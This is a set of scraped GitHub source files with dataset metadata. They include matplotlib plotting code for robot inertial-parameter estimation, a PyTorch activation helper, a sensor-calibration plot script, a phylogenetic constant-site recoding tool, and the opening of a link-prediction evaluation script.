'$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data[:,1] /= data[:,0]\r\n data[:,2] /= data[:,0]\r\n data[:,3] /= data[:,0]\r\n mse = np.empty_like(data)\r\n real_values = np.array([m, com_x,com_y,com_z, I_xx,I_xy,I_xz,I_yy,I_yz,I_zz])\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data[:,0])): #elementwise \r\n mse[i,idx] = (np.square(data[i,idx] - value)).mean(axis=None)\r\n for idx, param in enumerate(params):\r\n axarr[idx].plot(time, mse[:,idx], c=blue)\r\n axarr[idx].set_title(param)\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[9].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_two(time, data_1,estimation_approach_1, data_2,estimation_approach_2):\r\n f, axarr = plt.subplots(10,2,figsize=(10,15))\r\n f.suptitle(\"Inertial Parameter Estimation \", fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data_1[:,1] /= data_1[:,0]\r\n data_1[:,2] /= data_1[:,0]\r\n data_1[:,3] /= data_1[:,0]\r\n data_2[:,1] /= data_2[:,0]\r\n data_2[:,2] /= data_2[:,0]\r\n data_2[:,3] /= data_2[:,0]\r\n for idx, param in enumerate(params):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=blue)\r\n axarr[idx,0].set_title(param)\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n \r\n for idx, param in enumerate(params):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=red)\r\n axarr[idx,1].set_title(param)\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n axarr[0,0].set_title(estimation_approach_1)\r\n axarr[9,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[0,1].set_title(estimation_approach_2)\r\n axarr[9,1].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_three(time, data_1,estimation_approach_1, data_2,estimation_approach_2, data_3,estimation_approach_3):\r\n f, axarr = plt.subplots(10,3,figsize=(15,15))\r\n f.suptitle(\"Inertial Parameter Estimation \", fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data_1[:,1] /= data_1[:,0]\r\n data_1[:,2] /= data_1[:,0]\r\n data_1[:,3] /= data_1[:,0]\r\n data_2[:,1] /= data_2[:,0]\r\n data_2[:,2] /= data_2[:,0]\r\n data_2[:,3] /= data_2[:,0]\r\n data_3[:,1] /= data_3[:,0]\r\n data_3[:,2] /= data_3[:,0]\r\n data_3[:,3] /= data_3[:,0]\r\n for idx, param in enumerate(params):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=blue, label = estimation_approach_1)\r\n axarr[0,0].legend()\r\n axarr[idx,0].set_title(param)\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=red, label = estimation_approach_2)\r\n axarr[0,1].legend()\r\n axarr[idx,1].set_title(param)\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,2].plot(time, data_3[:,idx], c=green ,label = estimation_approach_3)\r\n axarr[0,2].legend()\r\n axarr[idx,2].set_title(param)\r\n axarr[idx,2].set_xlim([0, time[-1]])\r\n axarr[9,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,1].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,2].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\n\r\ndef Plot_intertial_params_three_errors(time, data_1,estimation_approach_1, data_2,estimation_approach_2, data_3,estimation_approach_3, m, com_x, com_y, com_z, I_xx, I_xy,I_xz, I_yy, I_yz, I_zz):\r\n f, axarr = plt.subplots(10,3,figsize=(15,15))\r\n f.suptitle(\"Inertial Parameter Estimation error\", fontsize=20)\r\n params = ['Mass error', 'COM_x error','COM_y error', 'COM_z error', '$I_{xx}$ error','$I_{xy}$ error', '$I_{xz}$ error','$I_{yy}$ error','$I_{yz}$ error','$I_{zz}$ error']\r\n data_1[:,1] /= data_1[:,0]\r\n data_1[:,2] /= data_1[:,0]\r\n data_1[:,3] /= data_1[:,0]\r\n data_2[:,1] /= data_2[:,0]\r\n data_2[:,2] /= data_2[:,0]\r\n data_2[:,3] /= data_2[:,0]\r\n data_3[:,1] /= data_3[:,0]\r\n data_3[:,2] /= data_3[:,0]\r\n data_3[:,3] /= data_3[:,0]\r\n \r\n mse_1 = np.empty_like(data_1)\r\n mse_2 = np.empty_like(data_1)\r\n mse_3 = np.empty_like(data_1)\r\n \r\n real_values = np.array([m, com_x,com_y,com_z, I_xx,I_xy,I_xz,I_yy,I_yz,I_zz])\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data_1[:,0])): #elementwise \r\n mse_1[i,idx] = (np.square(data_1[i,idx] - value)).mean(axis=None)\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data_2[:,0])): #elementwise \r\n mse_2[i,idx] = (np.square(data_2[i,idx] - value)).mean(axis=None)\r\n for idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(data_3[:,0])): #elementwise \r\n mse_3[i,idx] = (np.square(data_3[i,idx] - value)).mean(axis=None)\r\n \r\n \r\n\r\n for idx, param in enumerate(params):\r\n axarr[idx,0].plot(time, mse_1[:,idx], c=blue, label = estimation_approach_1)\r\n axarr[0,0].legend()\r\n axarr[idx,0].set_title(param)\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,1].plot(time, mse_2[:,idx], c=red, label = estimation_approach_2)\r\n axarr[0,1].legend()\r\n axarr[idx,1].set_title(param)\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n for idx, param in enumerate(params):\r\n axarr[idx,2].plot(time, mse_3[:,idx], c=green ,label = estimation_approach_3)\r\n axarr[0,2].legend()\r\n axarr[idx,2].set_title(param)\r\n axarr[idx,2].set_xlim([0, time[-1]])\r\n axarr[9,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,1].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[9,2].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\n \r\ndef Plot_one_dim(time, data, ylabel, title):\r\n plt.plot(time, data)\r\n plt.title(title)\r\n plt.ylabel(ylabel)\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n \r\ndef Plot_quaternions(time, quaternions):\r\n w = quaternions[:,0]\r\n x = quaternions[:,1]\r\n y = quaternions[:,2]\r\n z = quaternions[:,3]\r\n f, axarr = plt.subplots(2,2,figsize=(9,9))\r\n f.suptitle(\"Orientation represented as Unit Quaternions\" , fontsize=20)\r\n axarr[0,0].plot(time, w, c=blue)\r\n axarr[0,0].set_title(\"$q_w$\")\r\n axarr[0,0].set_xlim([0, time[-1]])\r\n axarr[0,1].plot(time, x, c=blue)\r\n axarr[0,1].set_title(\"$q_x$\")\r\n axarr[0,1].set_xlim([0, time[-1]])\r\n axarr[1,0].plot(time, y, c=blue)\r\n axarr[1,0].set_title(\"$q_y$\")\r\n axarr[1,0].set_xlim([0, time[-1]])\r\n axarr[1,0].set_xlabel(\"Elapsed time in s\")\r\n axarr[1,1].plot(time, z, c=blue)\r\n axarr[1,1].set_title(\"$q_z$\")\r\n axarr[1,1].set_xlim([0, time[-1]])\r\n axarr[1,1].set_xlabel(\"Elapsed time in s\")\r\n plt.setp([a.get_xticklabels() for a in axarr[0, :]], visible=False)\r\n \r\ndef Plot_kinematics_linear(time, data_1, data_2, data_3, title):\r\n f, axarr = plt.subplots(3,3,figsize=(15,15))\r\n f.suptitle(title, fontsize=20)\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=color_list[idx])\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n axarr[idx,0].set_ylabel(\"$r$\"+str(coordinate)+\" in \" \"$m$\")\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=color_list[idx])\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n axarr[idx,1].set_ylabel(\"$v$\"+str(coordinate)+\" in \" r\"$\\frac{m}{s}$\")\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,2].plot(time, data_3[:,idx], c=color_list[idx])\r\n axarr[idx,2].set_xlim([0, time[-1]])\r\n axarr[idx,2].set_ylabel(\"$a$\"+str(coordinate)+\" in \" r\"$\\frac{m}{s^2}$\")\r\n for idx in np.arange(3):\r\n axarr[2,idx].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in axarr[0, :]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_kinematics_angular_three_plots(time, quaternions, angular_velocity, angular_acceleration, title):\r\n kinematics_angular = np.concatenate([angular_velocity, angular_acceleration], axis=1)\r\n f, axarr = plt.subplots(1,3,figsize=(20,10))\r\n f.suptitle(title, fontsize=20)\r\n color_list_aux = [ grey, blue, red, green]\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n quaternion_labels = [\"$q_w$\", \"$q_x$\", \"$q_y$\",\"$q_z$\"]\r\n variables = [r\"$\\omega$\", r\"$\\alpha$\"]\r\n units = [r\"$\\frac{rad}{s}$\", r\"$\\frac{rad}{s^2}$\"]\r\n for idx, q_label in enumerate(quaternion_labels):\r\n axarr[0].plot(time, quaternions[:, idx], c = color_list_aux[idx], label = q_label)\r\n axarr[0].set_xlim([0, time[-1]])\r\n axarr[0].legend()\r\n axarr[0].set_xlabel(\"Elapsed time in $s$\")\r\n for j, (variable,unit) in enumerate(zip(variables,units)):\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[j+1].plot(time, kinematics_angular[:,idx+j*3], c=color_list_aux[idx+1], label = str(variable) + str(coordinate))\r\n axarr[j+1].set_xlim([0, time[-1]])\r\n axarr[j+1].set_ylabel(str(variable) +\" in \" + str(unit))\r\n axarr[j+1].legend()\r\n axarr[j+1].set_xlabel(\"Elapsed time in $s$\")\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_joint_angles(time, angles, title):\r\n joint_lables=['$q_1$','$q_2$','$q_3$','$q_4$','$q_5$','$q_6$','$q_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(\"$rad$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_velocities(time, angles, title):\r\n joint_lables=['$\\dot{q}_1$','$\\dot{q}_2$','$\\dot{q}_3$','$\\dot{q}_4$','$\\dot{q}_5$','$\\dot{q}_6$','$\\dot{q}_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(r\"$\\frac{rad}{s}$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_angles_axis(time, angles, title):\r\n joint_lables=['$q_4$','$q_5$','$q_6$', '$q_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(\"$rad$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_velocities_axis(time, angles, title):\r\n joint_lables=['$\\dot{q}_4$','$\\dot{q}_5$','$\\dot{q}_6$', '$\\dot{q}_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(r\"$\\frac{rad}{s}$\")\r\n plt.legend()\r\n \r\ndef Plot_force_torque(time, data_1, data_2):\r\n f, axarr = plt.subplots(3,2,figsize=(15,9))\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,0].plot(time, data_1[:,idx], c=color_list[idx])\r\n axarr[idx,0].set_xlim([0, time[-1]])\r\n axarr[idx,0].set_ylabel(\"$F$\"+str(coordinate)+\" in \" \"$N$\")\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx,1].plot(time, data_2[:,idx], c=color_list[idx])\r\n axarr[idx,1].set_xlim([0, time[-1]])\r\n axarr[idx,1].set_ylabel(r\"$\\tau$\"+str(coordinate)+\" in \" \"$Nm$\")\r\n axarr[2,0].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[2,1].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in axarr[0, :]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_joint_angles_axis_five(time, angles, title):\r\n joint_lables=['$q_3$','$q_4$','$q_5$','$q_6$', '$q_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot(time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(\"$rad$\")\r\n plt.legend()\r\n \r\ndef Plot_joint_velocities_axis_five(time, angles, title):\r\n joint_lables=['$\\dot{q}_3$','$\\dot{q}_4$','$\\dot{q}_5$','$\\dot{q}_6$', '$\\dot{q}_7$']\r\n for i, lable_q in enumerate(joint_lables):\r\n plt.plot( time, angles[:, i], c = color_list[i], label = lable_q )\r\n plt.xlabel(\"Elapsed time in $s$\")\r\n plt.ylabel(r\"$\\frac{rad}{s}$\")\r\n plt.legend() \r\n \r\n\r\n\r\n# In[4]:\r\n\r\n\r\nPlot_intertial_params_one_error (time, phi_RLS, \"Recursive Least Square\",1.3, 0.0 ,0.0, 0.09, 0.015, 0.0, 0.0, 0.15, 0.0, 0.04)\r\nPlot_intertial_params_one(time, phi_RLS, \"Recursive Least Square\")\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nPlot_force_torque(time, force_virtual, torque_virtual)\r\n\r\n\r\n# In[6]:\r\n\r\n\r\nPlot_kinematics_linear(time, pos, vel, accel, \"Linear kinematic variables\")\r\n\r\n\r\n# In[7]:\r\n\r\n\r\nPlot_kinematics_angular_three_plots(time, ori, avel, aaccel, \"Angular kinematic variables\")\r\n\r\n\r\n# In[8]:\r\n\r\n\r\nPlot_joint_angles(time, q, \"Joint angles\")\r\n\r\n\r\n# In[9]:\r\n\r\n\r\nPlot_joint_velocities(time, dq, \"Joint velocities\")\r\n\r\n\r\n# In[10]:\r\n\r\n\r\nPlot_joint_angles_axis_five(time, q_des, \"desired joint angles\")\r\n\r\n\r\n# In[86]:\r\n\r\n\r\nPlot_joint_velocities_axis_five(time, dq_des, \"desired joint velocities\")\r\n\r\n\r\n# In[34]:\r\n\r\n\r\ndef fourier_series(a, b, axis, N, w_f, q0, time):\r\n M_a = np.zeros(shape=(N, axis))\r\n M_b = np.zeros(shape=(N, axis))\r\n for i in np.arange(axis):\r\n for j in np.arange(N):\r\n M_a[j, i] = a[j+(i*2)]\r\n M_b[j, i] = b[j+(i*2)]\r\n \r\n arg = w_f * time\r\n arg_diff = w_f\r\n arg_diff_diff = w_f*w_f\r\n\r\n q = np.zeros(shape=(axis))\r\n dq = np.zeros(shape=(axis))\r\n ddq = np.zeros(shape=(axis))\r\n for i in np.arange(axis):\r\n q[i] = q0[i]\r\n for j in np.arange(N):\r\n q[i] += M_a[j,i] * np.sin(arg*(j+1)) + M_b[j,i] * np.cos(arg*(j+1))\r\n dq[i] += M_a[j,i] * arg_diff * (j+1) * np.cos(arg*(j+1)) - M_b[j,i] * arg_diff * (j+1) * np.sin(arg*(j+1))\r\n ddq[i] += - M_a[j,i] * arg_diff_diff * (j+1)*(j+1) * np.sin(arg*(j+1)) - M_b[j,i] * arg_diff_diff * (j+1)*(j+1) * np.cos(arg*(j+1))\r\n \r\n return q\r\ndef fourier(coeffs_a,coeffs_b,w_f, q0, time):\r\n q = q0\r\n for idx, (a, b) in enumerate(zip (coeffs_a, coeffs_b)):\r\n q += a * np.sin(w_f*time*(idx+1)) + b * np.cos(w_f*time*(idx+1))\r\n return q\r\ndef fourier_swevens(coeffs_a, coeffs_b, l_sums, w_f, q0, time):\r\n q = q0\r\n for (a, b, l) in zip (coeffs_a, coeffs_b, l_sums):\r\n q += a * np.sin(w_f*l*time) + b * np.cos(w_f*l*time)\r\n return q\r\n\r\n\r\n# In[98]:\r\n\r\n\r\na = np.array([-0.384447 ,-0.549169 , 0.234551 ,-0.0350113 , -0.187647 ,0.680153 -0.164255, -0.16014 , -0.699964 , -0.228531, -0.075119 , 0.27301 , -0.320018 , -0.110771 ,-0.0350925])\r\nb = np.array([ -0.306378 , -0.210935 , 0.4905 , 0.227061 , 0.209433 , -0.146835, -0.0387504 , 0.0323132 , -0.320253 , -0.285995 , 0.662638 ,-0.0026003 , -0.43539 , 0.134675, 0.185091])\r\n\r\n\r\naxis = 5\r\nN = 3 \r\nT_s = 1/500.0\r\nw_f = 0.628\r\nq0 = np.array([ 0, -115, 0, 60, 60.0])\r\nq0 *= np.pi/180.0\r\n# t = np.arange(60, step = 0.01)\r\n# q = fourier_series(a,b,axis,N, w_f, q0, t)\r\nq = np.array([fourier_series(a,b,axis,N, w_f, q0, t) for t in np.arange(2*np.pi/w_f, step = 0.01)])\r\n# q = np.array([fourier_series(a,b,axis,N, w_f, q0, t) for t in time])\r\nPlot_joint_angles_axis_five(np.arange(2*np.pi/w_f, step = 0.01), q, \"example\")\r\n\r\n\r\n\r\n# In[11]:\r\n\r\n\r\nPlot_joint_angles_axis_five(time, q_des, \"desired joint angles\")\r\n\r\n\r\n# In[36]:\r\n\r\n\r\na = np.array([ 0.974478 , -0.769762])\r\nb = np.array([-0.0587619 , -0.637884])\r\nw_f = 0.3\r\nq = np.array([fourier(a,b,w_f, 0, t) for t in time])\r\nplt.plot(time,q)\r\n\r\n\r\n# In[126]:\r\n\r\n\r\na = np.array([0,2.56e-2])\r\nb = np.array([1.57, 1.57])\r\nl = np.array([1,15])\r\nw_f = 0.17\r\nq0 = 0\r\nT_s = 0.024\r\ntime = np.arange(37, step=T_s)\r\nq = np.array([fourier_swevens(a, b, l, w_f, q0, k) for k in time])\r\nplt.plot(time, q)\r\n \r\n\r\n\r\n# In[143]:\r\n\r\n\r\nfrom constraint import *\r\nproblem = Problem()\r\nproblem.addVariable('a', range(-1,1))\r\nproblem.addVariable('b', range(-1,1))\r\nproblem.addConstraint(lambda a, b: a + b == 5)\r\nproblem.addConstraint(lambda a, b: a * b == 6)\r\nproblem.getSolutions()\r\n\r\n\r\n# In[27]:\r\n\r\n\r\ndef plot_diffs(time, data_1, data_2, data_3):\r\n f, axarr = plt.subplots(3,1,figsize=(10,15))\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx].plot(time, data_3[:,idx], c=green, label = \"ableitung computed\")\r\n axarr[idx].plot(time, data_1[:,idx], c=blue, label = \"stamm\")\r\n axarr[idx].plot(time, data_2[:,idx], c=red, label = \"ableitung sim\")\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[idx].set_xlabel(\"Elapsed time in $s$\")\r\n axarr[idx].legend()\r\n axarr[idx].grid(True)\r\n plt.setp([a.get_xticklabels() for a in axarr[0:]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n\r\n\r\n# In[28]:\r\n\r\n\r\nplot_diffs(time, pos, vel, pos_dot)\r\n\r\n\r\n# In[29]:\r\n\r\n\r\nplot_diffs(time, vel, accel, vel_dot)\r\n\r\n\r\n# In[38]:\r\n\r\n\r\nplot_diffs(time, avel, aaccel, avel_dot)\r\n\r\n\r\n# In[39]:\r\n\r\n\r\nplot_diffs(time, avel_sim, aaccel_sim, avel_sim_dot)\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n\r\n","repo_name":"elenamck/inertial_parameter_application","sub_path":"data_collection/simulation/plotter_input_kinematics.py","file_name":"plotter_input_kinematics.py","file_ext":"py","file_size_in_byte":25224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"40176493502","text":"\nfrom typing import Callable\nimport torch\n\ndef get_activation(activation: str) -> Callable[[torch.Tensor], torch.Tensor]:\n \"\"\" Parse the activation function to use in the MAF model \"\"\"\n if activation == 'tanh':\n return torch.tanh\n elif activation == 'relu':\n return torch.relu\n elif activation == 'sigmoid':\n return torch.sigmoid\n else:\n raise RuntimeError(\n \"activation should be tanh/relu/sigmoid, not {}\".format(activation))\n","repo_name":"trivnguyen/JeansGNN","sub_path":"src/jeans_gnn/gnn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"10880179750","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as anim\nimport math\nimport serial\nimport ser\n\ncorrect = [0]*1024\ns1, s2 = None \n\ndef calibrate(s1, s2):\n correct[s1] = (correct[s1] + (s1 - s2)) / 2\n\t#s1 = s1\n\t#s2 += correct[s1]\n\n#чертит график в реальном времени\ndef plot_update():\n\tsen1 = []\n\tsen2 = []\n\tfig = plt.figure(\"Неоткалиброванные измерения двух датчиков\")\n\tfig2 = plt.figure(\"Откалиброванные измерения двух датчиков\")\n\tax = fig.add_subplot(1,1,1)\n\ta2x = fig.add_subplot(1,1,1)\n\t\n\tdef update(i):\n\t\tsen1i = ser.main()[0]\n\t\tsen2i = ser.main()[1]\n\t\tsen1.append(sen1i)\n\t\tsen2.append(sen2i)\n\t\tx = range(len(sen1))\n\t\tax.clear()\n\t\tax.plot(x[:50], sen1[-50:])\n\t\tax.plot(x[:50], sen2[-50:])\n\n\ta = anim.FuncAnimation(fig, update, repeat=False)\n\tdef update2(i):\n\t\tsen1i = ser.main()[0]\n\t\tsen2i = ser.main()[1] + correct[ser.main()[0]]\n\t\tsen1.append(sen1i)\n\t\tsen2.append(sen2i)\n\t\tx = range(len(sen1))\n\t\ta2x.clear()\n\t\ta2x.plot(x[:50], sen1[-50:])\n\t\ta2x.plot(x[:50], sen2[-50:])\n\t\n\ta2 = anim.FuncAnimation(fig2, update2, repeat=False)\n\tplt.show()\n\n#чертит калибровочную функцию\ndef plot_calibrate():\n\tplt.plot(correct)\n\tplt.show()\n","repo_name":"tokelau/mobile_robots","sub_path":"calibration/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37128341524","text":"#!/usr/bin/env python\n#\n# sitewise_recode_constant_sites.py created 2018-02-02\n\n'''sitewise_recode_constant_sites.py last modified 2018-03-12\n recode constant sites as null from site-wise RAxML or phylobayes tabular output\n\nsitewise_recode_constant_sites.py -a matrix1.aln -l RAxML_perSiteLLs.matrix1.tab > RAxML_perSiteLLs.matrix1_w_const.tab\n\n matrix can be in alternate formats (use -f), and gzipped\n\n generate the tabular sitewise results using:\nsitewise_ll_to_columns.py RAxML_perSiteLLs.matrix1 > RAxML_perSiteLLs.matrix1.tab\n\n tabular likelihood output (-l) is assumed to look like:\nsite T1 T2 ...\n1 -12.345 -12.456 ...\n'''\n\nimport sys\nimport argparse\nimport time\nimport gzip\nfrom collections import Counter\nfrom Bio import AlignIO\n\ndef determine_constant_sites(fullalignment, alignformat):\n\t'''read large alignment, and return a dict where keys are constant positions'''\n\tif fullalignment.rsplit('.',1)[1]==\"gz\": # autodetect gzip format\n\t\topentype = gzip.open\n\t\tprint >> sys.stderr, \"# reading alignment {} as gzipped\".format(fullalignment), time.asctime()\n\telse: # otherwise assume normal open\n\t\topentype = open\n\t\tprint >> sys.stderr, \"# reading alignment {}\".format(fullalignment), time.asctime()\n\talignedseqs = AlignIO.read(opentype(fullalignment), alignformat)\n\tnumtaxa = len(alignedseqs)\n\tal_length = alignedseqs.get_alignment_length()\n\tprint >> sys.stderr, \"# Alignment contains {} taxa for {} sites, including gaps\".format( numtaxa, al_length )\n\n\tconstsites = {}\n\tprint >> sys.stderr, \"# determining constant sites\", time.asctime()\n\tfor i in range(al_length):\n\t\talignment_column = alignedseqs[:,i] # all letters per site\n\t\tnumgaps = alignment_column.count(\"-\")\n\t\tnogap_alignment_column = alignment_column.replace(\"-\",\"\").replace(\"X\",\"\") # excluding gaps\n\t\tnum_nogap_taxa = len(nogap_alignment_column)\n\t\taa_counter = Counter( nogap_alignment_column )\n\t\tmostcommonaa = aa_counter.most_common(1)[0][0]\n\n\t\tif len(aa_counter)==1: # meaning site has more than 1 possible AA, so use lnL\n\t\t\tconstsites[i+1] = True # use index plus 1 to match positions\n\t\t\tmostcommoncount = aa_counter.most_common(1)[0][1]\n\tprint >> sys.stderr, \"# Counted {} constant sites\".format( len(constsites) )\n\treturn constsites\n\ndef read_tabular_ln(lntabular, constsites, wayout):\n\t'''read tabular log-likelihood results and print a modified table where constants sites are recoded'''\n\tlinecounter = 0\n\trecodecount = 0\n\tprint >> sys.stderr, \"# Reading log-likelihood by site from {}\".format(lntabular), time.asctime()\n\tfor line in open(lntabular,'r'):\n\t\tline = line.strip()\n\t\tif line: # ignore blank lines\n\t\t\tlinecounter += 1\n\t\t\tif linecounter < 2:\n\t\t\t\tprint >> wayout, line\n\t\t\t\tcontinue\n\t\t\tlsplits = line.split('\\t')\n\t\t\tpos = int(lsplits[0]) # sites begin at 1\n\t\t\tif constsites.get(pos, False): # meaning site is constant, so recode\n\t\t\t\trecodecount += 1\n\t\t\t\trecodedsites = [\"const\"] * len(lsplits[1:])\n\t\t\t\tprint >> wayout, \"{}\\t{}\".format( pos, \"\\t\".join(recodedsites) )\n\t\t\telse:\n\t\t\t\tprint >> wayout, line\n\tprint >> sys.stderr, \"# Read {} lines, recoded {} sites\".format( linecounter,recodecount ), time.asctime()\n\ndef main(argv, wayout):\n\tif not len(argv):\n\t\targv.append('-h')\n\tparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)\n\tparser.add_argument('-a','--alignment', help=\"supermatrix alignment\")\n\tparser.add_argument('-f','--format', default=\"fasta\", help=\"alignment format [fasta]\")\n\tparser.add_argument('-l','--log-likelihood', help=\"tabular log-likelihood data file from RAxML\")\n\targs = parser.parse_args(argv)\n\n\tconstsitedict = determine_constant_sites(args.alignment, args.format)\n\tread_tabular_ln(args.log_likelihood, constsitedict, wayout)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:], sys.stdout)\n","repo_name":"wrf/pdbcolor","sub_path":"sitewise_scripts/sitewise_recode_constant_sites.py","file_name":"sitewise_recode_constant_sites.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"51"} +{"seq_id":"74439666399","text":"import os\nimport torch\nimport torch.nn.functional as F\nfrom data_preparation import prepare_training_data\nimport traceback\nfrom tqdm import tqdm\nfrom model_updated import Model\nfrom sklearn.metrics import roc_auc_score, f1_score, accuracy_score, average_precision_score, auc, precision_recall_curve\nimport torch.optim as optim\nfrom statistics import mean\nimport argparse\nimport utils\n\ndef cross_comm_evaluation(gt_user_user_edges, gt_user_user_labels, pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels, comm_path_to_user_path_mapping):\n test_user_user_labels = []\n test_user_user_edges = []\n \n test_eval = {}\n for comm_to_comm_edge, comm_to_comm_label in zip(pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels):\n\n for user_edge in comm_path_to_user_path_mapping[tuple(comm_to_comm_label)]:\n test_user_user_labels.append(comm_to_comm_edge.item())\n test_user_user_edges.append(user_edge)\n # if not tuple(comm_to_comm_label) in test_eval:\n # test_eval[tuple(comm_to_comm_label)] = {}\n # test_eval[tuple(comm_to_comm_label)][tuple(user_edge)] = (comm_to_comm_edge.item(), gt_user_user_labels[gt_user_user_edges.index(user_edge)])\n \n gt_user_user_edges, gt_user_user_labels = utils.simulsort(gt_user_user_edges, gt_user_user_labels)\n user_level_pathway_with_neg, user_level_pathway_with_neg_labels = utils.simulsort(test_user_user_edges, test_user_user_labels)\n # print(list(zip(pred_comm_to_comm_edges_w_neg, pred_test_comm_comm_labels)))\n # print(list(zip(user_level_pathway_with_neg, user_level_pathway_with_neg_labels)))\n \n \n return roc_auc_score(gt_user_user_labels, user_level_pathway_with_neg_labels),\\\n f1_score(gt_user_user_labels, [int(ele) for ele in user_level_pathway_with_neg_labels], average=\"micro\"),\\\n 